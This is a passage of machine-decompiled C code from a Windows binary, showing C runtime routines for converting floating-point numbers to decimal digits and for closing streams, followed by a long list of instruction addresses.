													if(_t1214 != 0) {
														__eflags = _t1214 - 1;
														if(_t1214 == 1) {
															goto L180;
														} else {
															__eflags = _v936;
															if(_v936 == 0) {
																goto L180;
															} else {
																_t1108 = 0;
																_v1884 = _v936;
																_t1257 = 0;
																__eflags = 0;
																do {
																	_t965 = _t1214;
																	_t1165 = _t965 *  *(_t1271 + _t1257 * 4 - 0x3a0) >> 0x20;
																	 *(_t1271 + _t1257 * 4 - 0x3a0) = _t965 *  *(_t1271 + _t1257 * 4 - 0x3a0) + _t1108;
																	asm("adc edx, 0x0");
																	_t1257 = _t1257 + 1;
																	_t1108 = _t1165;
																	__eflags = _t1257 - _v1884;
																} while (_t1257 != _v1884);
																L149:
																__eflags = _t1107;
																if(_t1107 == 0) {
																	goto L180;
																} else {
																	_t961 = _v936;
																	__eflags = _t961 - 0x73;
																	if(_t961 < 0x73) {
																		 *(_t1271 + _t961 * 4 - 0x3a0) = _t1107;
																		_v936 = _v936 + 1;
																		goto L180;
																	} else {
																		_v1400 = 0;
																		_v936 = 0;
																		_push(0);
																		_t940 =  &_v1396;
																		L188:
																		_push(_t940);
																		_push(_t1064);
																		_push( &_v932);
																		E003FBDE1();
																		_t1277 =  &(_t1277[4]);
																		_t933 = 0;
																	}
																}
															}
														}
													} else {
														_t929 = 0;
														_v1864 = 0;
														_v936 = 0;
														L178:
														_push(_t929);
														_t930 =  &_v1860;
														L179:
														_push(_t930);
														_push(_t1064);
														_push( &_v932);
														E003FBDE1();
														_t1277 =  &(_t1277[4]);
														L180:
														_t933 = 1;
													}
												}
												L181:
												__eflags = _t933;
												if(_t933 == 0) {
													_v2408 = _v2408 & 0x00000000;
													_t404 =  &_v936;
													 *_t404 = _v936 & 0x00000000;
													__eflags =  *_t404;
													_push(0);
													L190:
													_push( &_v2404);
													_t852 =  &_v932;
													L262:
													_push(_t1064);
													_push(_t852);
													E003FBDE1();
													_t1277 =  &(_t1277[4]);
												} else {
													goto L182;
												}
												goto L263;
												L182:
												_t908 = _v1908 - _v1888;
												__eflags = _t908;
												_v1908 = _t908;
											} while (_t908 != 0);
											_t1102 = _v1896;
											goto L184;
										}
									}
									L263:
									_t1194 = _v1920;
									_t1243 = _t1194;
									_t1086 = _v472;
									_v1872 = _t1243;
									__eflags = _t1086;
									if(_t1086 != 0) {
										_t1247 = 0;
										_t1198 = 0;
										__eflags = 0;
										do {
											_t841 =  *(_t1271 + _t1198 * 4 - 0x1d0);
											_t1151 = 0xa;
											_t1152 = _t841 * _t1151 >> 0x20;
											 *(_t1271 + _t1198 * 4 - 0x1d0) = _t841 * _t1151 + _t1247;
											asm("adc edx, 0x0");
											_t1198 = _t1198 + 1;
											_t1247 = _t1152;
											__eflags = _t1198 - _t1086;
										} while (_t1198 != _t1086);
										_v1896 = _t1247;
										__eflags = _t1247;
										_t1243 = _v1872;
										if(_t1247 != 0) {
											_t1095 = _v472;
											__eflags = _t1095 - 0x73;
											if(_t1095 >= 0x73) {
												__eflags = 0;
												_v2408 = 0;
												_v472 = 0;
												E003FBDE1( &_v468, _t1064,  &_v2404, 0);
												_t1277 =  &(_t1277[4]);
											} else {
												 *(_t1271 + _t1095 * 4 - 0x1d0) = _t1152;
												_v472 = _v472 + 1;
											}
										}
										_t1194 = _t1243;
									}
									_t815 = E003FD440( &_v472,  &_v936);
									_t1142 = 0xa;
									__eflags = _t815 - _t1142;
									if(_t815 != _t1142) {
										__eflags = _t815;
										if(_t815 != 0) {
											_t816 = _t815 + 0x30;
											__eflags = _t816;
											_t1243 = _t1194 + 1;
											 *_t1194 = _t816;
											_v1872 = _t1243;
											goto L282;
										} else {
											_t817 = _v1904 - 1;
										}
									} else {
										_v1904 = _v1904 + 1;
										_t1243 = _t1194 + 1;
										_t832 = _v936;
										 *_t1194 = 0x31;
										_v1872 = _t1243;
										__eflags = _t832;
										if(_t832 != 0) {
											_t1197 = 0;
											_t1246 = _t832;
											_t1094 = 0;
											__eflags = 0;
											do {
												_t833 =  *(_t1271 + _t1094 * 4 - 0x3a0);
												 *(_t1271 + _t1094 * 4 - 0x3a0) = _t833 * _t1142 + _t1197;
												asm("adc edx, 0x0");
												_t1094 = _t1094 + 1;
												_t1197 = _t833 * _t1142 >> 0x20;
												_t1142 = 0xa;
												__eflags = _t1094 - _t1246;
											} while (_t1094 != _t1246);
											_t1243 = _v1872;
											__eflags = _t1197;
											if(_t1197 != 0) {
												_t836 = _v936;
												__eflags = _t836 - 0x73;
												if(_t836 >= 0x73) {
													_v2408 = 0;
													_v936 = 0;
													E003FBDE1( &_v932, _t1064,  &_v2404, 0);
													_t1277 =  &(_t1277[4]);
												} else {
													 *(_t1271 + _t836 * 4 - 0x3a0) = _t1197;
													_v936 = _v936 + 1;
												}
											}
										}
										L282:
										_t817 = _v1904;
									}
									 *((intOrPtr*)(_v1924 + 4)) = _t817;
									_t1070 = _v1916;
									__eflags = _t817;
									if(_t817 >= 0) {
										__eflags = _t1070 - 0x7fffffff;
										if(_t1070 <= 0x7fffffff) {
											_t1070 = _t1070 + _t817;
											__eflags = _t1070;
										}
									}
									_t819 = _a24 - 1;
									__eflags = _t819 - _t1070;
									if(_t819 >= _t1070) {
										_t819 = _t1070;
									}
									_t755 = _t819 + _v1920;
									_v1916 = _t755;
									__eflags = _t1243 - _t755;
									if(__eflags != 0) {
										while(1) {
											_t755 = _v472;
											__eflags = _t755;
											if(__eflags == 0) {
												goto L303;
											}
											_t1195 = 0;
											_t1244 = _t755;
											_t1090 = 0;
											__eflags = 0;
											do {
												_t820 =  *(_t1271 + _t1090 * 4 - 0x1d0);
												 *(_t1271 + _t1090 * 4 - 0x1d0) = _t820 * 0x3b9aca00 + _t1195;
												asm("adc edx, 0x0");
												_t1090 = _t1090 + 1;
												_t1195 = _t820 * 0x3b9aca00 >> 0x20;
												__eflags = _t1090 - _t1244;
											} while (_t1090 != _t1244);
											_t1245 = _v1872;
											__eflags = _t1195;
											if(_t1195 != 0) {
												_t826 = _v472;
												__eflags = _t826 - 0x73;
												if(_t826 >= 0x73) {
													__eflags = 0;
													_v2408 = 0;
													_v472 = 0;
													E003FBDE1( &_v468, _t1064,  &_v2404, 0);
													_t1277 =  &(_t1277[4]);
												} else {
													 *(_t1271 + _t826 * 4 - 0x1d0) = _t1195;
													_v472 = _v472 + 1;
												}
											}
											_t825 = E003FD440( &_v472,  &_v936);
											_t1196 = 8;
											_t1070 = _v1916 - _t1245;
											__eflags = _t1070;
											do {
												_t708 = _t825 % _v1912;
												_t825 = _t825 / _v1912;
												_t1142 = _t708 + 0x30;
												__eflags = _t1070 - _t1196;
												if(_t1070 >= _t1196) {
													 *(_t1196 + _t1245) = _t1142;
												}
												_t1196 = _t1196 - 1;
												__eflags = _t1196 - 0xffffffff;
											} while (_t1196 != 0xffffffff);
											__eflags = _t1070 - 9;
											if(_t1070 > 9) {
												_t1070 = 9;
											}
											_t1243 = _t1245 + _t1070;
											_v1872 = _t1243;
											__eflags = _t1243 - _v1916;
											if(__eflags != 0) {
												continue;
											}
											goto L303;
										}
									}
									L303:
									 *_t1243 = 0;
									goto L309;
								}
							}
						}
					}
				} else {
					_t1070 = _t1234 & 0x000fffff;
					if((_t1186 | _t1234 & 0x000fffff) != 0) {
						goto L5;
					} else {
						_push(0x408404);
						 *((intOrPtr*)(_v1924 + 4)) =  *(_v1924 + 4) & 0x00000000;
						L308:
						_push(_a24);
						_push(_t1055);
						if(E003F8D67() != 0) {
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E003F9097();
							asm("int3");
							_push(0x10);
							E003EF5F0(_t1055, _t1186, _t1234);
							_v32 = _v32 & 0x00000000;
							E003FAC31(8);
							_t1071 = 0x40c4e8;
							_t721 =  &_v8;
							 *_t721 = _v8 & 0x00000000;
							__eflags =  *_t721;
							_t1235 = 3;
							while(1) {
								_v36 = _t1235;
								__eflags = _t1235 -  *0x432274; // 0x200
								if(__eflags == 0) {
									break;
								}
								_t763 =  *0x432278; // 0x0
								_t764 =  *(_t763 + _t1235 * 4);
								__eflags = _t764;
								if(_t764 != 0) {
									__eflags =  *(_t764 + 0xc) >> 0x0000000d & 0x00000001;
									if(__eflags != 0) {
										_t773 =  *0x432278; // 0x0
										_push( *((intOrPtr*)(_t773 + _t1235 * 4)));
										_t774 = E00400023(_t1055, _t1071, _t1142, _t1186, _t1235, __eflags);
										__eflags = _t774 - 0xffffffff;
										if(_t774 != 0xffffffff) {
											_t731 =  &_v32;
											 *_t731 = _v32 + 1;
											__eflags =  *_t731;
										}
									}
									_t767 =  *0x432278; // 0x0
									DeleteCriticalSection( *((intOrPtr*)(_t767 + _t1235 * 4)) + 0x20);
									_t770 =  *0x432278; // 0x0
									E003F8DCC( *((intOrPtr*)(_t770 + _t1235 * 4)));
									_pop(_t1071);
									_t772 =  *0x432278; // 0x0
									_t737 = _t772 + _t1235 * 4;
									 *_t737 =  *(_t772 + _t1235 * 4) & 0x00000000;
									__eflags =  *_t737;
								}
								_t1235 = _t1235 + 1;
							}
							_v8 = 0xfffffffe;
							E003FED21();
							return E003EF640(_v32);
						} else {
							L309:
							_t1284 = _v1936;
							_pop(_t1187);
							_pop(_t1236);
							_pop(_t1056);
							if(_v1936 != 0) {
								_t755 = E003FF381(_t1070, _t1284,  &_v1944);
							}
							return E003EFBBC(_t755, _t1056, _v8 ^ _t1271, _t1142, _t1187, _t1236);
						}
					}
				}
			}


































































































































































































































































                0x003fd8ee
                0x003fd8f1
                0x003fd8f3
                0x003fd8f9
                0x003fd900
                0x003fd903
                0x003fd904
                0x003fd90d
                0x003fd90e
                0x003fd90f
                0x003fd912
                0x003fd918
                0x003fd91e
                0x003fd923
                0x003fd932
                0x003fd934
                0x003fd936
                0x003fd936
                0x003fd93d
                0x003fd947
                0x003fd94c
                0x003fd94f
                0x003fd973
                0x003fd977
                0x003fd97c
                0x003fd97d
                0x003fd97f
                0x003fd981
                0x003fd987
                0x003fd987
                0x003fd98e
                0x003fd98e
                0x003fd991
                0x003fec41
                0x00000000
                0x003fd997
                0x003fd997
                0x003fd997
                0x003fd99a
                0x003fec3a
                0x00000000
                0x003fd9a0
                0x003fd9a0
                0x003fd9a0
                0x003fd9a3
                0x003fec33
                0x00000000
                0x003fd9a9
                0x003fd9a9
                0x003fd9ac
                0x003fec2c
                0x00000000
                0x003fd9b2
                0x003fd9bb
                0x003fd9c3
                0x003fd9c6
                0x003fd9c9
                0x003fd9cc
                0x003fd9d2
                0x003fd9da
                0x003fd9e0
                0x003fd9ea
                0x003fd9ea
                0x003fd9ed
                0x003fd9f5
                0x003fd9fc
                0x003fd9fc
                0x003fd9ef
                0x003fd9ef
                0x003fd9f1
                0x003fda04
                0x003fda0a
                0x003fda0c
                0x003fda10
                0x003fda15
                0x003fda22
                0x003fda24
                0x003fda2a
                0x003fda2f
                0x003fda31
                0x003fda34
                0x003fda3a
                0x003fda3b
                0x003fda40
                0x003fda46
                0x003fda4b
                0x003fda54
                0x003fda54
                0x003fda56
                0x003fda4d
                0x003fda4d
                0x003fda52
                0x00000000
                0x00000000
                0x003fda52
                0x003fda5c
                0x003fda64
                0x003fda66
                0x003fda6f
                0x003fda70
                0x003fda76
                0x003fda78
                0x003fde6b
                0x003fde71
                0x003fdf90
                0x003fdf90
                0x003fdf97
                0x003fdf97
                0x003fdf97
                0x003fdf9e
                0x003fdfa1
                0x003fdfa8
                0x003fdfa8
                0x003fdfa3
                0x003fdfa3
                0x003fdfa3
                0x003fdfac
                0x003fdfad
                0x003fdfaf
                0x003fdfb2
                0x003fdfb5
                0x003fdfb8
                0x003fdfbe
                0x003fdfc1
                0x003fdfc4
                0x003fdfce
                0x003fdfce
                0x003fdfce
                0x003fdfc6
                0x003fdfc6
                0x003fdfc8
                0x00000000
                0x003fdfca
                0x003fdfca
                0x003fdfca
                0x003fdfc8
                0x003fdfd0
                0x003fdfd2
                0x003fe073
                0x003fe073
                0x003fe080
                0x003fe080
                0x003fe080
                0x003fe096
                0x003fe09b
                0x003fdfd8
                0x003fdfd8
                0x003fdfda
                0x00000000
                0x003fdfe0
                0x003fdfe2
                0x003fdfe3
                0x003fdfe5
                0x003fdfe7
                0x003fdfe7
                0x003fdfe9
                0x003fdfec
                0x003fdff4
                0x003fdff6
                0x003fdff9
                0x003fdfff
                0x003fdfff
                0x003fe001
                0x003fe00d
                0x003fe00d
                0x003fe00d
                0x003fe003
                0x003fe005
                0x003fe005
                0x003fe014
                0x003fe017
                0x003fe019
                0x003fe020
                0x003fe020
                0x003fe01b
                0x003fe01b
                0x003fe01b
                0x003fe028
                0x003fe032
                0x003fe038
                0x003fe039
                0x003fe03e
                0x003fe044
                0x003fe047
                0x00000000
                0x00000000
                0x003fe049
                0x003fe049
                0x003fe051
                0x003fe051
                0x003fe057
                0x003fe05e
                0x003fe06b
                0x003fe060
                0x003fe060
                0x003fe063
                0x003fe063
                0x003fe05e
                0x003fdfda
                0x003fe0a7
                0x003fe0b7
                0x003fe0c4
                0x003fe0c6
                0x003fe0cd
                0x003fde77
                0x003fde77
                0x003fde80
                0x003fde81
                0x003fde8b
                0x003fde91
                0x003fde93
                0x003fde99
                0x003fde99
                0x003fde9b
                0x003fde9b
                0x003fdea2
                0x003fdea9
                0x00000000
                0x00000000
                0x003fdeaf
                0x003fdeb2
                0x003fdeb5
                0x00000000
                0x003fdeb7
                0x003fdeb7
                0x003fdeb7
                0x003fdeb7
                0x003fdebe
                0x003fdec1
                0x003fdec8
                0x003fdec8
                0x003fdec3
                0x003fdec3
                0x003fdec3
                0x003fdecc
                0x003fdecf
                0x003fded1
                0x003fded3
                0x003fded9
                0x003fdedf
                0x003fdee1
                0x003fdee1
                0x003fdee1
                0x003fdee8
                0x003fdee8
                0x003fdeea
                0x003fdef6
                0x003fdef6
                0x003fdef6
                0x003fdeec
                0x003fdeee
                0x003fdeee
                0x003fdefd
                0x003fdf00
                0x003fdf02
                0x003fdf09
                0x003fdf09
                0x003fdf04
                0x003fdf04
                0x003fdf04
                0x003fdf11
                0x003fdf1c
                0x003fdf22
                0x003fdf23
                0x003fdf28
                0x003fdf2e
                0x003fdf31
                0x00000000
                0x00000000
                0x003fdf33
                0x003fdf33
                0x003fdf3d
                0x003fdf48
                0x003fdf50
                0x003fdf56
                0x003fdf61
                0x003fdf67
                0x003fdf6e
                0x003fdf81
                0x003fdf88
                0x003fdf88
                0x00000000
                0x003fdeb5
                0x003fde9b
                0x00000000
                0x003fde93
                0x003fe0d0
                0x003fe0d0
                0x003fe0d6
                0x003fe0db
                0x003fe0e1
                0x003fe0f4
                0x003fe0f9
                0x003fda7e
                0x003fda7e
                0x003fda87
                0x003fda88
                0x003fda92
                0x003fda98
                0x003fda9a
                0x003fdca0
                0x003fdca8
                0x003fdcab
                0x003fdcb0
                0x003fdcb3
                0x003fdcbb
                0x003fdcbf
                0x003fdcc5
                0x003fdccb
                0x003fdcd0
                0x003fdcd7
                0x003fdcd8
                0x003fdcd8
                0x003fdcd8
                0x003fdcdf
                0x003fdce2
                0x003fdcea
                0x003fdcf0
                0x003fdcf5
                0x003fdcf5
                0x003fdcf2
                0x003fdcf2
                0x003fdcf2
                0x003fdcf9
                0x003fdcfa
                0x003fdcfc
                0x003fdcff
                0x003fdd05
                0x003fdd0b
                0x003fdd0e
                0x003fdd11
                0x003fdd17
                0x003fdd1a
                0x003fdd1d
                0x003fdd27
                0x003fdd27
                0x003fdd27
                0x003fdd1f
                0x003fdd1f
                0x003fdd21
                0x00000000
                0x003fdd23
                0x003fdd23
                0x003fdd23
                0x003fdd21
                0x003fdd29
                0x003fdd2b
                0x003fde1d
                0x003fde1d
                0x003fde1f
                0x003fde25
                0x003fde2b
                0x003fde40
                0x003fde45
                0x003fdd31
                0x003fdd31
                0x003fdd33
                0x00000000
                0x003fdd39
                0x003fdd3b
                0x003fdd3c
                0x003fdd3e
                0x003fdd40
                0x003fdd42
                0x003fdd42
                0x003fdd48
                0x003fdd4a
                0x003fdd50
                0x003fdd53
                0x003fdd61
                0x003fdd67
                0x003fdd67
                0x003fdd69
                0x003fdd6c
                0x003fdd72
                0x003fdd72
                0x003fdd74
                0x00000000
                0x00000000
                0x003fdd76
                0x003fdd78
                0x003fdd7e
                0x003fdd7e
                0x003fdd7a
                0x003fdd7a
                0x003fdd7a
                0x003fdd83
                0x003fdd85
                0x003fdd8c
                0x003fdd8c
                0x003fdd87
                0x003fdd87
                0x003fdd87
                0x003fddb2
                0x003fddb8
                0x003fddbb
                0x003fddc1
                0x003fddc8
                0x003fddc9
                0x003fddca
                0x003fddd0
                0x003fddd3
                0x003fddd5
                0x00000000
                0x003fddd5
                0x00000000
                0x003fddd3
                0x003fdddd
                0x003fdde3
                0x003fddeb
                0x003fddeb
                0x003fddec
                0x003fddee
                0x003fddf2
                0x003fddfa
                0x003fddfa
                0x003fddfa
                0x003fddfc
                0x003fde03
                0x003fde08
                0x003fde15
                0x003fde0a
                0x003fde0d
                0x003fde0d
                0x003fde08
                0x003fdd33
                0x003fde48
                0x003fde52
                0x003fde58
                0x003fde5e
                0x003fde64
                0x003fdaa0
                0x003fdaa0
                0x003fdaa0
                0x003fdaa2
                0x003fdaa9
                0x003fdab0
                0x00000000
                0x00000000
                0x003fdab6
                0x003fdab9
                0x003fdabc
                0x00000000
                0x003fdabe
                0x003fdac6
                0x003fdacb
                0x003fdad0
                0x003fdad1
                0x003fdad3
                0x003fdadb
                0x003fdadf
                0x003fdae5
                0x003fdaeb
                0x003fdaf0
                0x003fdaf7
                0x003fdaf7
                0x003fdaf8
                0x003fdafb
                0x003fdb03
                0x003fdb09
                0x003fdb0e
                0x003fdb0e
                0x003fdb0b
                0x003fdb0b
                0x003fdb0b
                0x003fdb12
                0x003fdb13
                0x003fdb15
                0x003fdb18
                0x003fdb1e
                0x003fdb24
                0x003fdb27
                0x003fdb2a
                0x003fdb30
                0x003fdb33
                0x003fdb36
                0x003fdb40
                0x003fdb40
                0x003fdb40
                0x003fdb38
                0x003fdb38
                0x003fdb3a
                0x00000000
                0x003fdb3c
                0x003fdb3c
                0x003fdb3c
                0x003fdb3a
                0x003fdb42
                0x003fdb44
                0x003fdc39
                0x003fdc39
                0x003fdc3b
                0x003fdc41
                0x003fdc47
                0x003fdc5c
                0x003fdc61
                0x003fdb4a
                0x003fdb4a
                0x003fdb4c
                0x00000000
                0x003fdb52
                0x003fdb54
                0x003fdb55
                0x003fdb57
                0x003fdb59
                0x003fdb5b
                0x003fdb5b
                0x003fdb61
                0x003fdb63
                0x003fdb69
                0x003fdb6c
                0x003fdb7a
                0x003fdb80
                0x003fdb80
                0x003fdb82
                0x003fdb85
                0x003fdb8b
                0x003fdb8b
                0x003fdb8d
                0x00000000
                0x00000000
                0x003fdb8f
                0x003fdb91
                0x003fdb97
                0x003fdb97
                0x003fdb93
                0x003fdb93
                0x003fdb93
                0x003fdb9c
                0x003fdb9e
                0x003fdbab
                0x003fdbab
                0x003fdba0
                0x003fdba6
                0x003fdba6
                0x003fdbc9
                0x003fdbd1
                0x003fdbd8
                0x003fdbdf
                0x003fdbe0
                0x003fdbe3
                0x003fdbe9
                0x003fdbef
                0x003fdbf2
                0x003fdbf4
                0x00000000
                0x003fdbf4
                0x00000000
                0x003fdbf2
                0x003fdbfc
                0x003fdc02
                0x003fdc02
                0x003fdc08
                0x003fdc0a
                0x003fdc14
                0x003fdc16
                0x003fdc16
                0x003fdc16
                0x003fdc18
                0x003fdc1f
                0x003fdc24
                0x003fdc31
                0x003fdc26
                0x003fdc29
                0x003fdc29
                0x003fdc24
                0x003fdb4c
                0x003fdc64
                0x003fdc6f
                0x003fdc70
                0x003fdc71
                0x003fdc77
                0x003fdc7d
                0x003fdc83
                0x003fdc83
                0x00000000
                0x003fdabc
                0x00000000
                0x003fdaa2
                0x003fdc84
                0x003fdc8a
                0x003fdc91
                0x003fdc92
                0x003fdc93
                0x003fdc98
                0x003fdc98
                0x003fe0fc
                0x003fe106
                0x003fe107
                0x003fe10d
                0x003fe10f
                0x003fe578
                0x003fe57a
                0x003fe57c
                0x003fe582
                0x003fe584
                0x003fe58a
                0x003fe58c
                0x003fe8de
                0x003fe8de
                0x003fe8e0
                0x003fe8e6
                0x003fe8ed
                0x003fe8f3
                0x003fe8f5
                0x003fe993
                0x003fe993
                0x003fe995
                0x003fe996
                0x003fe99c
                0x00000000
                0x003fe8fb
                0x003fe8fb
                0x003fe8fe
                0x003fe904
                0x003fe90a
                0x003fe90c
                0x003fe912
                0x003fe914
                0x003fe914
                0x003fe916
                0x003fe916
                0x003fe91f
                0x003fe926
                0x003fe92c
                0x003fe92f
                0x003fe930
                0x003fe932
                0x003fe932
                0x003fe936
                0x003fe938
                0x003fe93a
                0x003fe940
                0x003fe943
                0x00000000
                0x003fe945
                0x003fe945
                0x003fe94c
                0x003fe94c
                0x003fe943
                0x003fe938
                0x003fe90c
                0x003fe8fe
                0x003fe8f5
                0x003fe592
                0x003fe592
                0x003fe592
                0x003fe595
                0x003fe599
                0x003fe599
                0x003fe59a
                0x003fe5ac
                0x003fe5b9
                0x003fe5c8
                0x003fe5f2
                0x003fe5f7
                0x003fe5fd
                0x003fe600
                0x003fe606
                0x003fe609
                0x003fe6a2
                0x003fe6a9
                0x003fe727
                0x003fe72d
                0x003fe733
                0x003fe736
                0x003fe738
                0x003fe7c1
                0x003fe73e
                0x003fe73e
                0x003fe744
                0x003fe744
                0x003fe74a
                0x003fe750
                0x003fe752
                0x003fe754
                0x003fe754
                0x003fe75a
                0x003fe760
                0x003fe762
                0x003fe76a
                0x003fe76a
                0x003fe770
                0x003fe772
                0x003fe774
                0x003fe77a
                0x003fe77c
                0x003fe893
                0x003fe895
                0x003fe89b
                0x003fe89b
                0x003fe89e
                0x003fe89f
                0x00000000
                0x003fe782
                0x003fe788
                0x003fe788
                0x003fe78a
                0x003fe790
                0x003fe793
                0x003fe79a
                0x003fe7a0
                0x003fe7a2
                0x003fe7c9
                0x003fe7cb
                0x003fe7cd
                0x003fe7cf
                0x003fe7d5
                0x003fe7db
                0x003fe875
                0x003fe875
                0x003fe878
                0x00000000
                0x003fe87e
                0x003fe87e
                0x003fe884
                0x00000000
                0x003fe884
                0x003fe7e1
                0x003fe7e1
                0x003fe7e1
                0x003fe7e4
                0x00000000
                0x00000000
                0x003fe7e6
                0x003fe7e8
                0x003fe7ea
                0x003fe7f3
                0x003fe7f3
                0x003fe7f5
                0x003fe7fb
                0x003fe7fb
                0x003fe807
                0x003fe812
                0x003fe815
                0x003fe822
                0x003fe825
                0x003fe826
                0x003fe827
                0x003fe82d
                0x003fe82f
                0x003fe835
                0x003fe83b
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x003fe83d
                0x003fe83d
                0x003fe83d
                0x003fe83f
                0x00000000
                0x00000000
                0x003fe841
                0x003fe844
                0x00000000
                0x003fe84a
                0x003fe84a
                0x003fe84c
                0x003fe84e
                0x003fe84e
                0x003fe84e
                0x003fe856
                0x003fe859
                0x003fe859
                0x003fe85f
                0x003fe861
                0x003fe863
                0x003fe86a
                0x003fe870
                0x003fe872
                0x00000000
                0x003fe872
                0x00000000
                0x003fe844
                0x00000000
                0x003fe83d
                0x00000000
                0x003fe7e1
                0x003fe7a4
                0x003fe7a4
                0x003fe7a6
                0x003fe7ac
                0x003fe7b3
                0x003fe7b3
                0x003fe7b6
                0x003fe7b6
                0x00000000
                0x003fe7a6
                0x00000000
                0x003fe88a
                0x003fe88a
                0x003fe88b
                0x003fe88b
                0x00000000
                0x003fe790
                0x003fe6ab
                0x003fe6ab
                0x003fe6bd
                0x003fe6cc
                0x003fe6d1
                0x003fe6d4
                0x003fe6d6
                0x00000000
                0x003fe6dc
                0x003fe6dc
                0x003fe6df
                0x00000000
                0x003fe6e5
                0x003fe6e5
                0x003fe6ec
                0x00000000
                0x003fe6f2
                0x003fe6f8
                0x003fe6fa
                0x003fe700
                0x003fe700
                0x003fe702
                0x003fe702
                0x003fe704
                0x003fe70d
                0x003fe714
                0x003fe717
                0x003fe718
                0x003fe71a
                0x003fe71a
                0x00000000
                0x003fe722
                0x003fe6ec
                0x003fe6df
                0x003fe6d6
                0x003fe60f
                0x003fe60f
                0x003fe615
                0x003fe617
                0x003fe633
                0x003fe636
                0x00000000
                0x003fe63c
                0x003fe63c
                0x003fe643
                0x00000000
                0x003fe649
                0x003fe64f
                0x003fe651
                0x003fe657
                0x003fe657
                0x003fe659
                0x003fe659
                0x003fe65b
                0x003fe664
                0x003fe66b
                0x003fe66e
                0x003fe66f
                0x003fe671
                0x003fe671
                0x003fe679
                0x003fe679
                0x003fe67b
                0x00000000
                0x003fe681
                0x003fe681
                0x003fe687
                0x003fe68a
                0x003fe954
                0x003fe957
                0x003fe95d
                0x003fe972
                0x003fe977
                0x003fe97a
                0x003fe690
                0x003fe690
                0x003fe697
                0x00000000
                0x003fe697
                0x003fe68a
                0x003fe67b
                0x003fe643
                0x003fe619
                0x003fe619
                0x003fe61b
                0x003fe621
                0x003fe627
                0x003fe628
                0x003fe8a5
                0x003fe8a5
                0x003fe8ac
                0x003fe8ad
                0x003fe8ae
                0x003fe8b3
                0x003fe8b6
                0x003fe8b6
                0x003fe8b6
                0x003fe617
                0x003fe8b8
                0x003fe8b8
                0x003fe8ba
                0x003fe981
                0x003fe988
                0x003fe98f
                0x003fe9a2
                0x003fe9a8
                0x003fe9a9
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x003fe8c0
                0x003fe8c6
                0x003fe8c6
                0x003fe8cc
                0x003fe8cc
                0x003fe8d8
                0x00000000
                0x003fe8d8
                0x003fe115
                0x003fe115
                0x003fe117
                0x003fe11d
                0x003fe11f
                0x003fe125
                0x003fe127
                0x003fe49e
                0x003fe49e
                0x003fe4a0
                0x003fe4a6
                0x003fe4ad
                0x003fe4af
                0x003fe50e
                0x003fe511
                0x003fe517
                0x003fe51d
                0x003fe523
                0x003fe525
                0x003fe52b
                0x003fe52d
                0x003fe52d
                0x003fe52f
                0x003fe52f
                0x003fe531
                0x003fe53a
                0x003fe541
                0x003fe544
                0x003fe545
                0x003fe547
                0x003fe547
                0x003fe54f
                0x003fe551
                0x003fe557
                0x003fe55d
                0x003fe560
                0x00000000
                0x003fe566
                0x003fe566
                0x003fe56d
                0x003fe56d
                0x003fe560
                0x003fe551
                0x003fe525
                0x003fe4b1
                0x003fe4b1
                0x003fe4b3
                0x003fe4b9
                0x003fe4bf
                0x00000000
                0x003fe4bf
                0x003fe4af
                0x003fe12d
                0x003fe12d
                0x003fe12d
                0x003fe130
                0x003fe134
                0x003fe134
                0x003fe135
                0x003fe147
                0x003fe154
                0x003fe163
                0x003fe18d
                0x003fe192
                0x003fe198
                0x003fe19b
                0x003fe1a1
                0x003fe1a4
                0x003fe220
                0x003fe227
                0x003fe2eb
                0x003fe2f1
                0x003fe2f7
                0x003fe2fa
                0x003fe2fc
                0x003fe385
                0x003fe302
                0x003fe302
                0x003fe308
                0x003fe308
                0x003fe30e
                0x003fe314
                0x003fe316
                0x003fe318
                0x003fe318
                0x003fe31e
                0x003fe324
                0x003fe326
                0x003fe32e
                0x003fe32e
                0x003fe334
                0x003fe336
                0x003fe338
                0x003fe33e
                0x003fe340
                0x003fe457
                0x003fe459
                0x003fe45f
                0x003fe45f
                0x00000000
                0x003fe346
                0x003fe34c
                0x003fe34c
                0x003fe34e
                0x003fe354
                0x003fe357
                0x003fe35e
                0x003fe364
                0x003fe366
                0x003fe38d
                0x003fe38f
                0x003fe391
                0x003fe393
                0x003fe399
                0x003fe39f
                0x003fe439
                0x003fe439
                0x003fe43c
                0x00000000
                0x003fe442
                0x003fe442
                0x003fe448
                0x00000000
                0x003fe448
                0x003fe3a5
                0x003fe3a5
                0x003fe3a5
                0x003fe3a8
                0x00000000
                0x00000000
                0x003fe3aa
                0x003fe3ac
                0x003fe3ae
                0x003fe3b7
                0x003fe3b7
                0x003fe3b9
                0x003fe3bf
                0x003fe3bf
                0x003fe3cb
                0x003fe3d6
                0x003fe3d9
                0x003fe3e6
                0x003fe3e9
                0x003fe3ea
                0x003fe3eb
                0x003fe3f1
                0x003fe3f3
                0x003fe3f9
                0x003fe3ff
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x003fe401
                0x003fe401
                0x003fe401
                0x003fe403
                0x00000000
                0x00000000
                0x003fe405
                0x003fe408
                0x003fe4c2
                0x003fe4c2
                0x003fe4c4
                0x003fe4ca
                0x003fe4d0
                0x003fe4d1
                0x00000000
                0x003fe40e
                0x003fe40e
                0x003fe410
                0x003fe412
                0x003fe412
                0x003fe412
                0x003fe41a
                0x003fe41d
                0x003fe41d
                0x003fe423
                0x003fe425
                0x003fe427
                0x003fe42e
                0x003fe434
                0x003fe436
                0x00000000
                0x003fe436
                0x00000000
                0x003fe408
                0x00000000
                0x003fe401
                0x00000000
                0x003fe3a5
                0x003fe368
                0x003fe368
                0x003fe36a
                0x003fe370
                0x003fe377
                0x003fe377
                0x003fe37a
                0x003fe37a
                0x00000000
                0x003fe36a
                0x00000000
                0x003fe44e
                0x003fe44e
                0x003fe44f
                0x003fe44f
                0x00000000
                0x003fe354
                0x003fe22d
                0x003fe22d
                0x003fe23f
                0x003fe24e
                0x003fe253
                0x003fe256
                0x003fe258
                0x003fe274
                0x003fe277
                0x00000000
                0x003fe27d
                0x003fe27d
                0x003fe284
                0x00000000
                0x003fe28a
                0x003fe290
                0x003fe292
                0x003fe298
                0x003fe298
                0x003fe29a
                0x003fe29a
                0x003fe29c
                0x003fe2a5
                0x003fe2ac
                0x003fe2af
                0x003fe2b0
                0x003fe2b2
                0x003fe2b2
                0x00000000
                0x003fe29a
                0x003fe284
                0x003fe25a
                0x003fe25c
                0x003fe262
                0x003fe268
                0x003fe269
                0x00000000
                0x003fe269
